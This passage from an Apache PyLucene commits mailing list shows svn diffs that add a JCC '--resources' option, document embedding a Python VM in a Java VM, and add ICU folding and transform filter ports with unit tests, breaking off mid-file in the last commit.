06:47:13 -0000 Delivered-To: [email protected] Received: (qmail 19806 invoked by uid 500); 19 Apr 2010 06:47:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19798 invoked by uid 99); 19 Apr 2010 06:47:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 06:47:12 +0000 X-ASF-Spam-Status: No, hits=-1411.0 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 06:47:11 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3956223888DD; Mon, 19 Apr 2010 06:46:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r935465 - /lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Date: Mon, 19 Apr 2010 06:46:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Mon Apr 19 06:46:28 2010 New Revision: 935465 URL: http://svn.apache.org/viewvc?rev=935465&view=rev Log: - added section about embedding a Python VM in a Java VM Modified: lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Modified: lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml URL: http://svn.apache.org/viewvc/lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml?rev=935465&r1=935464&r2=935465&view=diff ============================================================================== --- lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml (original) +++ lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Mon Apr 19 06:46:28 2010 @@ -292,9 +292,11 @@ Java VM to search for classes. Every Python extension produced by JCC exports a <code>CLASSPATH</code> variable that is hardcoded to the jar files that it was produced from. A copy of each jar file - is installed as a resources files along with the extension when - JCC is invoked with the <code>--install</code> command line - argument. For example: + is installed as a resource file with the extension when JCC is + invoked with the <code>--install</code> command line argument. + This parameter is optional and defaults to the + <code>CLASSPATH</code> string exported by the module + <code>initVM</code> is imported from. <source> >>> import lucene >>> lucene.initVM(classpath=lucene.CLASSPATH) @@ -304,10 +306,10 @@ <code>initialheap</code><br/> The initial amount of Java heap to start the Java VM with. This argument is a string that follows the same syntax as the - similar <code>-Xms</code> java command line argument. For example: + similar <code>-Xms</code> java command line argument. <source> >>> import lucene - >>> lucene.initVM(lucene.CLASSPATH, initialheap='32m') + >>> lucene.initVM(initialheap='32m') >>> lucene.Runtime.getRuntime().totalMemory() 33357824L </source> @@ -330,8 +332,7 @@ startup rountine. These are passed through as-is. For example: <source> >>> import lucene - >>> lucene.initVM(lucene.CLASSPATH, - vmargs='-Xcheck:jni,-verbose:jni,-verbose:gc') + >>> lucene.initVM(vmargs='-Xcheck:jni,-verbose:jni,-verbose:gc') </source> </li> </ul> @@ -421,10 +422,10 @@ Java 1.5 added support for parameterized types. JCC generates code to heed type parameters unless the <code>--no-generics</code> command line parameter is used. Java type parameterization is a - runtime feature. There is only one class used for all its + runtime feature. The same class is used for all its parameterizations. Similarly, JCC wrapper objects all use the same class but store type parameterizations on instances and make them - accessible as a tuple via the <code>parameters_</code> variable. + accessible as a tuple via the <code>parameters_</code> property. </p> <p> For example, an <code>ArrayList&lt;Document&gt;</code> instance, @@ -435,9 +436,9 @@ <p> To allocate an instance of a generic Java class with specific type parameters use the <code>of_()</code> method. This method accepts - one or more Python classes to use as type parameters. For + one or more Python wrapper classes to use as type parameters. For example, <code>java.util.ArrayList&lt;E&gt;</code> is declared to - accept one type parameter. Its wrapper's <code>of_()</code> + accept one type parameter. Its wrapper's <code>of_()</code> method hence accepts one parameter, a Python class, to use as type parameter for the return type of its <code>get()</code> method, among others: @@ -641,7 +642,7 @@ implement first such an extension class in Java: </p> <source> - package org.osafoundation.lucene.analysis; + package org.apache.pylucene.analysis; import org.apache.lucene.analysis.Analyzer; import org.apache.lucene.analysis.TokenStream; @@ -699,23 +700,29 @@ </p> <source> class _analyzer(PythonAnalyzer): - def tokenStream(self, fieldName, reader): + def tokenStream(_self, fieldName, reader): class _tokenStream(PythonTokenStream): - def __init__(self): - super(_tokenStream, self).__init__() - self.TOKENS = ["1", "2", "3", "4", "5"] - self.INCREMENTS = [1, 2, 1, 0, 1] - self.i = 0 - def next(self): - if self.i == len(self.TOKENS): - return None - t = Token(self.TOKENS[self.i], self.i, self.i) - t.setPositionIncrement(self.INCREMENTS[self.i]) - self.i += 1 - return t - def reset(self): + def __init__(self_): + super(_tokenStream, self_).__init__() + self_.TOKENS = ["1", "2", "3", "4", "5"] + self_.INCREMENTS = [1, 2, 1, 0, 1] + self_.i = 0 + self_.posIncrAtt = self_.addAttribute(PositionIncrementAttribute.class_) + self_.termAtt = self_.addAttribute(TermAttribute.class_) + self_.offsetAtt = self_.addAttribute(OffsetAttribute.class_) + def incrementToken(self_): + if self_.i == len(self_.TOKENS): + return False + self_.termAtt.setTermBuffer(self_.TOKENS[self_.i]) + self_.offsetAtt.setOffset(self_.i, self_.i) + self_.posIncrAtt.setPositionIncrement(self_.INCREMENTS[self_.i]) + self_.i += 1 + return True + def end(self_): pass - def close(self): + def reset(self_): + pass + def close(self_): pass return _tokenStream() </source> @@ -736,6 +743,78 @@ and <a href="site:documentation/readme">samples</a>. </p> </section> + <section id="embedding"> + <title>Embedding a Python VM in a Java VM</title> + <p> + Using the same techniques used when writing a Python extension of a + Java class, JCC may also be used to embed a Python VM in a Java VM. + Following are the steps and constraints to follow to achieve this: + </p> + <ul> + <li> + JCC must be built in shared mode. + See <a href="site:jcc/documentation/install">installation + instructions</a> for more information about shared mode. + </li> + <li> + As described in the previous section, define one or more Java + classes to be "extended" from Python to provide the + implementations of the native methods declared on them. Instances + of these classes implement the bridges into the Python VM from + Java. + </li> + <li> + The <code>org.apache.jcc.PythonVM</code> Java class is going be + used from the Java VM's main thread to initialize the embedded + Python VM. This class is installed inside the JCC egg under the + <code>jcc/classes</code> directory and the full path to this + directory must be on the Java <code>CLASSPATH</code>. + </li> + <li> + The JCC egg directory contains the JCC shared runtime library - not + the JCC Python extension shared library - but a library + called <code>libjcc.dylib</code> on Mac OS X, + <code>libjcc.so</code> on Linux or <code>jcc.dll</code> on Windows. + This directory must be added to the Java VM's shared library path + via the <code>-Djava.library.path</code> command line parameter. + </li> + <li> + In the Java VM's main thread, initialize the Python VM by calling + its static <code>start()</code> method passing it a Python program + name string and optional start-up arguments in a string array that + will be made accessible in Python via <code>sys.argv</code>. + This method returns the singleton PythonVM instance to be used in + this Java VM. This instance may be retrieved at any later time via + the static <code>get()</code> method defined on the + <code>org.apache.jcc.PythonVM</code> class. + </li> + <li> + Any Java VM thread that is going to be calling into the Python VM + should start with acquiring a reference to the Python thread state + object by calling <code>acquireThreadState()</code> method on the + Python VM instance. It should then release the Python thread state + before terminating by calling <code>releaseThreadState()</code>. + Calling these methods is optional but strongly recommended as it + ensures that Python is not creating and throwing away a thread + state everytime the Python VM is entered and exited from a given + Java VM thread. + </li> + <li> + Any Java VM thread may instantiate a Python object for which an + extension class was defined in Java as described in the previous + section by calling the <code>instantiate()</code> method on the + PythonVM instance. This method takes two string parameters, the + name of the Python module and the name of the Python class to + import and instantiate from it. The <code>__init__()</code> + constructor on this class must be callable without any parameters + and, if defined, must call <code>super()</code> in order to + initialize the Java side. The <code>instantiate()</code> method is + declared to return <code>java.lang.Object</code> but the return + value is actually an instance of the Java extension class used and + must be downcast to it. + </li> + </ul> + </section> <section id="python"> <title>Pythonic protocols</title> <p> From [email protected] Thu Apr 22 23:39:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73898 invoked from network); 22 Apr 2010 23:39:12 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Apr 2010 23:39:12 -0000 Received: (qmail 22842 invoked by uid 500); 22 Apr 2010 23:39:12 -0000 Delivered-To: [email protected] Received: (qmail 22817 invoked by uid 500); 22 Apr 2010 23:39:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22809 invoked by uid 99); 22 Apr 2010 23:39:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 23:39:12 +0000 X-ASF-Spam-Status: No, hits=-1425.7 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 23:39:11 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 43495238897A; Thu, 22 Apr 2010 23:38:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r937107 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/__main__.py jcc/cpp.py jcc/python.py setup.py Date: Thu, 22 Apr 2010 23:38:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Thu Apr 22 23:38:28 2010 New Revision: 937107 URL: http://svn.apache.org/viewvc?rev=937107&view=rev Log: - added support for --resources Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/__main__.py lucene/pylucene/trunk/jcc/jcc/cpp.py lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/setup.py Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=937107&r1=937106&r2=937107&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Thu Apr 22 23:38:28 2010 @@ -16,6 +16,7 @@ Version 2.5 -> - added support for auto-boxing Number from python int, long and float - added 'asm' to list of reserved words - added JCC_VERSION string to modules using JCC + - added support for --resources - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/__main__.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/__main__.py?rev=937107&r1=937106&r2=937107&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/__main__.py (original) +++ lucene/pylucene/trunk/jcc/jcc/__main__.py Thu Apr 22 23:38:28 2010 @@ -32,6 +32,8 @@ if len(sys.argv) == 1 or '--help' in sys clashes with C/C++ reserved words or header file definitions --vmarg - add extra Java VM initialization parameter + --resources - include resource directory in distribution as + package data Python wrapper generation options: --python NAME - generate wrappers for use from Python in a module Modified: lucene/pylucene/trunk/jcc/jcc/cpp.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/cpp.py?rev=937107&r1=937106&r2=937107&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/cpp.py (original) +++ lucene/pylucene/trunk/jcc/jcc/cpp.py Thu Apr 22 23:38:28 2010 @@ -317,6 +317,7 @@ def jcc(args): compiler = None generics = hasattr(_jcc, "Type") arch = [] + resources = [] i = 1 while i < len(args): @@ -421,6 +422,9 @@ def jcc(args): generics = False elif arg == '--find-jvm-dll': find_jvm_dll = True + elif arg == '--resources': + i += 1 + resources.append(args[i]) else: raise ValueError, "Invalid argument: %s" %(arg) else: @@ -444,7 +448,7 @@ def jcc(args): install, dist, debug, jars, version, prefix, root, install_dir, home_dir, use_distutils, shared, compiler, modules, wininst, find_jvm_dll, - arch, generics) + arch, generics, resources) else: for className in classNames: if className in excludes: @@ -565,7 +569,7 @@ def jcc(args): install, dist, debug, jars, version, prefix, root, install_dir, home_dir, use_distutils, shared, compiler, modules, wininst, find_jvm_dll, - arch, generics) + arch, generics, resources) def header(env, out, cls, typeset, packages, excludes, generics): Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=937107&r1=937106&r2=937107&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Thu Apr 22 23:38:28 2010 @@ -1512,7 +1512,8 @@ def module(out, allInOne, classes, cppdi def compile(env, jccPath, output, moduleName, install, dist, debug, jars, version, prefix, root, install_dir, home_dir, use_distutils, - shared, compiler, modules, wininst, find_jvm_dll, arch, generics): + shared, compiler, modules, wininst, find_jvm_dll, arch, generics, + resources): try: if use_distutils: @@ -1556,6 +1557,25 @@ def compile(env, jccPath, output, module for jar in jars: shutil.copy2(jar, modulePath) package_data.append(os.path.basename(jar)) + if resources: + def copytree(src, dst): + _dst = os.path.join(modulePath, dst) + if not os.path.exists(_dst): + os.mkdir(_dst) + for name in os.listdir(src): + if name.startswith('.'): + continue + _src = os.path.join(src, name) + if os.path.islink(_src): + continue + _dst = os.path.join(dst, name) + if os.path.isdir(_src): + copytree(_src, _dst) + else: + shutil.copy2(_src, os.path.join(modulePath, _dst)) + package_data.append(_dst) + for resource in resources: + copytree(resource, os.path.split(resource)[-1]) packages = [moduleName] if modules: Modified: lucene/pylucene/trunk/jcc/setup.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/setup.py?rev=937107&r1=937106&r2=937107&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/setup.py (original) +++ lucene/pylucene/trunk/jcc/setup.py Thu Apr 22 23:38:28 2010 @@ -12,7 +12,7 @@ import os, sys, platform, subprocess -jcc_ver = '2.5' +jcc_ver = '2.6' machine = platform.machine() if machine.startswith("iPod") or machine.startswith("iPhone"): From [email protected] Thu Apr 22 23:44:33 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74379 invoked from network); 22 Apr 2010 23:44:33 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Apr 2010 23:44:33 -0000 Received: (qmail 24499 invoked by uid 500); 22 Apr 2010 23:44:33 -0000 Delivered-To: [email protected] Received: (qmail 24480 invoked by uid 500); 22 Apr 2010 23:44:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24470 invoked by uid 99); 22 Apr 2010 23:44:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 23:44:33 +0000 X-ASF-Spam-Status: No, hits=-1439.7 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 23:44:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3A624238897A; Thu, 22 Apr 2010 23:43:50 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Subject: svn commit: r937108 - in /lucene/pylucene/trunk: CHANGES Makefile python/ICUFoldingFilter.py test/test_ICUFoldingFilter.py test/test_PositionIncrement.py Date: Thu, 22 Apr 2010 23:43:50 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Thu Apr 22 23:43:49 2010 New Revision: 937108 URL: http://svn.apache.org/viewvc?rev=937108&view=rev Log: - added port of ICUFoldingFilter using C++ ICU's Normalizer2 via PyICU Added: lucene/pylucene/trunk/python/ICUFoldingFilter.py (with props) lucene/pylucene/trunk/test/test_ICUFoldingFilter.py (with props) Modified: lucene/pylucene/trunk/CHANGES lucene/pylucene/trunk/Makefile lucene/pylucene/trunk/test/test_PositionIncrement.py Modified: lucene/pylucene/trunk/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/CHANGES?rev=937108&r1=937107&r2=937108&view=diff ============================================================================== --- lucene/pylucene/trunk/CHANGES (original) +++ lucene/pylucene/trunk/CHANGES Thu Apr 22 23:43:49 2010 @@ -4,6 +4,8 @@ Version 3.0.0 -> - improved support for building on Windows with mingw32 - added wininst target to Makefile - added port of ICUNormalizer2Filter using C++ ICU's Normalizer2 via PyICU + - added port of ICUFoldingFilter using C++ ICU's Normalizer2 via PyICU + - PyLucene built with JCC 2.6 - Version 2.9.0 -> 3.0.0 Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=937108&r1=937107&r2=937108&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Thu Apr 22 23:43:49 2010 @@ -143,6 +143,7 @@ MEMORY_JAR=$(LUCENE)/build/contrib/memor QUERIES_JAR=$(LUCENE)/build/contrib/queries/lucene-queries-$(LUCENE_VER).jar EXTENSIONS_JAR=build/jar/extensions.jar +ICUPKG:=$(shell which icupkg) .PHONY: generate compile install default all clean realclean \ sources test jars distrib @@ -191,6 +192,27 @@ JARS=$(LUCENE_JAR) $(ANALYZERS_JAR) \ jars: $(JARS) + +ifneq ($(ICUPKG),) + +RESOURCES=--resources $(LUCENE)/contrib/icu/src/resources +ENDIANNESS:=$(shell $(PYTHON) -c "import struct; print struct.pack('h', 1) == '\000\001' and 'b' or 'l'") + +resources: $(LUCENE)/contrib/icu/src/resources/org/apache/lucene/analysis/icu/utr30.dat + +$(LUCENE)/contrib/icu/src/resources/org/apache/lucene/analysis/icu/utr30.dat: $(LUCENE)/contrib/icu/src/resources/org/apache/lucene/analysis/icu/utr30.nrm + rm -f $@ + cd $(dir $<); icupkg --type $(ENDIANNESS) --add $(notdir $<) new $(notdir $@) + +else + +RESOURCES= + +resources: + @echo ICU not installed + +endif + GENERATE=$(JCC) $(foreach jar,$(JARS),--jar $(jar)) \ --package java.lang java.lang.System \ java.lang.Runtime \ @@ -216,6 +238,8 @@ GENERATE=$(JCC) $(foreach jar,$(JARS),-- --version $(LUCENE_VER) \ --module python/collections.py \ --module python/ICUNormalizer2Filter.py \ + --module python/ICUFoldingFilter.py \ + $(RESOURCES) \ --files $(NUM_FILES) generate: jars @@ -233,7 +257,7 @@ bdist: jars wininst: jars $(GENERATE) --wininst -all: sources jars compile +all: sources jars resources compile @echo build of $(PYLUCENE_LIB) complete clean: Added: lucene/pylucene/trunk/python/ICUFoldingFilter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/python/ICUFoldingFilter.py?rev=937108&view=auto ============================================================================== --- lucene/pylucene/trunk/python/ICUFoldingFilter.py (added) +++ lucene/pylucene/trunk/python/ICUFoldingFilter.py Thu Apr 22 23:43:49 2010 @@ -0,0 +1,74 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUFoldingFilter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) +# +# A TokenFilter that applies search term folding to Unicode text, +# applying foldings from UTR#30 Character Foldings. +# +# This filter applies the following foldings from the report to unicode text: +# +# Accent removal +# Case folding +# Canonical duplicates folding +# Dashes folding +# Diacritic removal (including stroke, hook, descender) +# Greek letterforms folding +# Han Radical folding +# Hebrew Alternates folding +# Jamo folding +# Letterforms folding +# Math symbol folding +# Multigraph Expansions: All +# Native digit folding +# No-break folding +# Overline folding +# Positional forms folding +# Small forms folding +# Space folding +# Spacing Accents folding +# Subscript folding +# Superscript folding +# Suzhou Numeral folding +# Symbol folding +# Underline folding +# Vertical forms folding +# Width folding +# +# Additionally, Default Ignorables are removed, and text is normalized to NFKC. +# All foldings, case folding, and normalization mappings are applied +# recursively to ensure a fully folded and normalized result. +# +# ==================================================================== + +import os, lucene + +from lucene.ICUNormalizer2Filter import ICUNormalizer2Filter +from icu import ResourceBundle, Normalizer2, UNormalizationMode2 + +utr30 = os.path.join(lucene.__dir__, 'resources', + 'org', 'apache', 'lucene', 'analysis', 'icu', + 'utr30.dat') +ResourceBundle.setAppData("utr30", utr30) + + +class ICUFoldingFilter(ICUNormalizer2Filter): + + def __init__(self, input): + + normalizer = Normalizer2.getInstance("utr30", "utr30", + UNormalizationMode2.COMPOSE) + super(ICUFoldingFilter, self).__init__(input, normalizer) Propchange: lucene/pylucene/trunk/python/ICUFoldingFilter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/python/ICUFoldingFilter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/test/test_ICUFoldingFilter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_ICUFoldingFilter.py?rev=937108&view=auto ============================================================================== --- lucene/pylucene/trunk/test/test_ICUFoldingFilter.py (added) +++ lucene/pylucene/trunk/test/test_ICUFoldingFilter.py Thu Apr 22 23:43:49 2010 @@ -0,0 +1,90 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUFoldingFilter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) + +try: + from icu import Normalizer2, UNormalizationMode2 +except ImportError, e: + pass + +from unittest import main +from BaseTokenStreamTestCase import BaseTokenStreamTestCase + +from lucene import * +from lucene.ICUFoldingFilter import ICUFoldingFilter + + +class TestICUFoldingFilter(BaseTokenStreamTestCase): + + def testDefaults(self): + + class _analyzer(PythonAnalyzer): + def tokenStream(_self, fieldName, reader): + return ICUFoldingFilter(WhitespaceTokenizer(Version.LUCENE_CURRENT, reader)) + + a = _analyzer() + + # case folding + self._assertAnalyzesTo(a, "This is a test", + [ "this", "is", "a", "test" ]) + + # case folding + self._assertAnalyzesTo(a, u"Ruß", [ "russ" ]) + + # case folding with accent removal + self._assertAnalyzesTo(a, u"ΜΆΪΟΣ", [ u"μαιοσ" ]) + self._assertAnalyzesTo(a, u"Μάϊος", [ u"μαιοσ" ]) + + # supplementary case folding + self._assertAnalyzesTo(a, u"𐐖", [ u"𐐾" ]) + + # normalization + self._assertAnalyzesTo(a, u"ﴳﴺﰧ", [ u"طمطمطم" ]) + + # removal of default ignorables + self._assertAnalyzesTo(a, u"क्‍ष", [ u"कष" ]) + + # removal of latin accents (composed) + self._assertAnalyzesTo(a, u"résumé", [ "resume" ]) + + # removal of latin accents (decomposed) + self._assertAnalyzesTo(a, u"re\u0301sume\u0301", [ u"resume" ]) + + # fold native digits + self._assertAnalyzesTo(a, u"৭০৬", [ "706" ]) + + # ascii-folding-filter type stuff + self._assertAnalyzesTo(a, u"đis is cræzy", [ "dis", "is", "craezy" ]) + + +if __name__ == "__main__": + import sys, lucene + try: + import icu + except ImportError: + pass + else: + lucene.initVM() + if '-loop' in sys.argv: + sys.argv.remove('-loop') + while True: + try: + main() + except: + pass + else: + main() Propchange: lucene/pylucene/trunk/test/test_ICUFoldingFilter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/test/test_ICUFoldingFilter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: lucene/pylucene/trunk/test/test_PositionIncrement.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_PositionIncrement.py?rev=937108&r1=937107&r2=937108&view=diff ============================================================================== --- lucene/pylucene/trunk/test/test_PositionIncrement.py (original) +++ lucene/pylucene/trunk/test/test_PositionIncrement.py Thu Apr 22 23:43:49 2010 @@ -42,11 +42,11 @@ class PositionIncrementTestCase(TestCase self_.posIncrAtt.setPositionIncrement(self_.INCREMENTS[self_.i]) self_.i += 1 return True - def end(self): + def end(self_): pass - def reset(self): + def reset(self_): pass - def close(self): + def close(self_): pass return _tokenStream() From [email protected] Tue Apr 27 20:27:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1612 invoked from network); 27 Apr 2010 20:27:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Apr 2010 20:27:55 -0000 Received: (qmail 25911 invoked by uid 500); 27 Apr 2010 20:27:55 -0000 Delivered-To: [email protected] Received: (qmail 25892 invoked by uid 500); 27 Apr 2010 20:27:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25883 invoked by uid 99); 27 Apr 2010 20:27:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Apr 2010 20:27:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Apr 2010 20:27:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BB55223889D7; Tue, 27 Apr 2010 20:27:07 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Subject: svn commit: r938638 - in /lucene/pylucene/trunk: CHANGES Makefile python/ICUTransformFilter.py test/test_ICUTransformFilter.py Date: Tue, 27 Apr 2010 20:27:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Tue Apr 27 20:27:07 2010 New Revision: 938638 URL: http://svn.apache.org/viewvc?rev=938638&view=rev Log: - added port of ICUTransformFilter using C++ ICU's Transliterator via PyICU Added: lucene/pylucene/trunk/python/ICUTransformFilter.py (with props) lucene/pylucene/trunk/test/test_ICUTransformFilter.py (with props) Modified: lucene/pylucene/trunk/CHANGES lucene/pylucene/trunk/Makefile Modified: lucene/pylucene/trunk/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/CHANGES?rev=938638&r1=938637&r2=938638&view=diff ============================================================================== --- lucene/pylucene/trunk/CHANGES (original) +++ lucene/pylucene/trunk/CHANGES Tue Apr 27 20:27:07 2010 @@ -5,6 +5,7 @@ Version 3.0.0 -> - added wininst target to Makefile - added port of ICUNormalizer2Filter using C++ ICU's Normalizer2 via PyICU - added port of ICUFoldingFilter using C++ ICU's Normalizer2 via PyICU + - added port of ICUTransformFilter using C++ ICU's Transliterator via PyICU - PyLucene built with JCC 2.6 - Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=938638&r1=938637&r2=938638&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Tue Apr 27 20:27:07 2010 @@ -202,7 +202,7 @@ resources: $(LUCENE)/contrib/icu/src/res $(LUCENE)/contrib/icu/src/resources/org/apache/lucene/analysis/icu/utr30.dat: $(LUCENE)/contrib/icu/src/resources/org/apache/lucene/analysis/icu/utr30.nrm rm -f $@ - cd $(dir $<); icupkg --type $(ENDIANNESS) --add $(notdir $<) new $(notdir $@) + cd $(dir $<); $(ICUPKG) --type $(ENDIANNESS) --add $(notdir $<) new $(notdir $@) else @@ -239,6 +239,7 @@ GENERATE=$(JCC) $(foreach jar,$(JARS),-- --module python/collections.py \ --module python/ICUNormalizer2Filter.py \ --module python/ICUFoldingFilter.py \ + --module python/ICUTransformFilter.py \ $(RESOURCES) \ --files $(NUM_FILES) Added: lucene/pylucene/trunk/python/ICUTransformFilter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/python/ICUTransformFilter.py?rev=938638&view=auto ============================================================================== --- lucene/pylucene/trunk/python/ICUTransformFilter.py (added) +++ lucene/pylucene/trunk/python/ICUTransformFilter.py Tue Apr 27 20:27:07 2010 @@ -0,0 +1,85 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the 